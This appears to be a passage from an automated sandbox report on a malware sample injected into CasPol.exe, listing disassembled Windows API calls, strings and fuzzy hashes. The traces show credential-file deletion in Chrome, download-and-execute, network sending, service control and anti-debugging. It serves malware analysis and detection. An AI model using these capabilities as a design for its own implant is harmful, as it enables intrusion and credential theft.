                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2341273852-0
                                                                                                            • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                            • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                            • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                            • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                            • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                            • API String ID: 341183262-3780268858
                                                                                                            • Opcode ID: 5c4d7f5cc93035747a764e7710dd22b22cb4f919a2a8588896b861aaa8e097fb
                                                                                                            • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                            • Opcode Fuzzy Hash: 5c4d7f5cc93035747a764e7710dd22b22cb4f919a2a8588896b861aaa8e097fb
                                                                                                            • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                            • API String ID: 2127411465-314212984
                                                                                                            • Opcode ID: f8d616d4508dc2c046470fb811fbd903af535893f3080e052b4e915e73f2105b
                                                                                                            • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                            • Opcode Fuzzy Hash: f8d616d4508dc2c046470fb811fbd903af535893f3080e052b4e915e73f2105b
                                                                                                            • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                                            Strings
                                                                                                            • UserProfile, xrefs: 0040B227
                                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                            • API String ID: 2018770650-1062637481
                                                                                                            • Opcode ID: 0250d3fa7d8b70bc47a8355f7fd743dddf47cdaa6e39fb173e6c2dd5a2cb84fd
                                                                                                            • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                            • Opcode Fuzzy Hash: 0250d3fa7d8b70bc47a8355f7fd743dddf47cdaa6e39fb173e6c2dd5a2cb84fd
                                                                                                            • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                            • API String ID: 3534403312-3733053543
                                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 4043647387-0
                                                                                                            • Opcode ID: 5770e205a92bdaf62436f7e3a944b8f2fc74aac352c1461ab2ed34b4eace6724
                                                                                                            • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                            • Opcode Fuzzy Hash: 5770e205a92bdaf62436f7e3a944b8f2fc74aac352c1461ab2ed34b4eace6724
                                                                                                            • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                            • String ID:
                                                                                                            • API String ID: 276877138-0
                                                                                                            • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                            • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                            • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                            • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                                            • API String ID: 1589313981-1420736420
                                                                                                            • Opcode ID: 70035bef8a8482817f5ed11c5e7eeb401def3e9ea01ea4c5943ce5132b462a45
                                                                                                            • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                            • Opcode Fuzzy Hash: 70035bef8a8482817f5ed11c5e7eeb401def3e9ea01ea4c5943ce5132b462a45
                                                                                                            • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                            • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP
                                                                                                            • API String ID: 2299586839-711371036
                                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                            • String ID: SETTINGS
                                                                                                            • API String ID: 3473537107-594951305
                                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1157919129-0
                                                                                                            • Opcode ID: ad182ef0116283bf3863836c6a83626c4c767cd38c875da217e7cde8bb8463e0
                                                                                                            • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                            • Opcode Fuzzy Hash: ad182ef0116283bf3863836c6a83626c4c767cd38c875da217e7cde8bb8463e0
                                                                                                            • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                            APIs
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 1286116820-0
                                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DownloadExecuteFileShell
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                            • API String ID: 2825088817-4197237851
                                                                                                            • Opcode ID: 7e776ba55a5363882e5e0fdd32d5076bdbc944cfa7fb92e574dd5d07027ce71d
                                                                                                            • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                            • Opcode Fuzzy Hash: 7e776ba55a5363882e5e0fdd32d5076bdbc944cfa7fb92e574dd5d07027ce71d
                                                                                                            • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstNextsend
                                                                                                            • String ID: x@G$x@G
                                                                                                            • API String ID: 4113138495-3390264752
                                                                                                            • Opcode ID: ab297d9523434e33b62ec7d17f5bfb0d18f84337fe1b3eac542df82c58dbccc1
                                                                                                            • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                            • Opcode Fuzzy Hash: ab297d9523434e33b62ec7d17f5bfb0d18f84337fe1b3eac542df82c58dbccc1
                                                                                                            • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                              • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                              • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                            • Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                                                            • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                            • Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                                                            • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 4212172061-0
                                                                                                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                            • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                            • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 301083792-0
                                                                                                            • Opcode ID: 86dbfe1775f8993f11ef77801d49ff7d9b45b30bdf2a989ad682b912e639e09b
                                                                                                            • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                            • Opcode Fuzzy Hash: 86dbfe1775f8993f11ef77801d49ff7d9b45b30bdf2a989ad682b912e639e09b
                                                                                                            • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 2829624132-0
                                                                                                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                            • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                            • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434403), ref: 0043A755
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434403), ref: 0043A75F
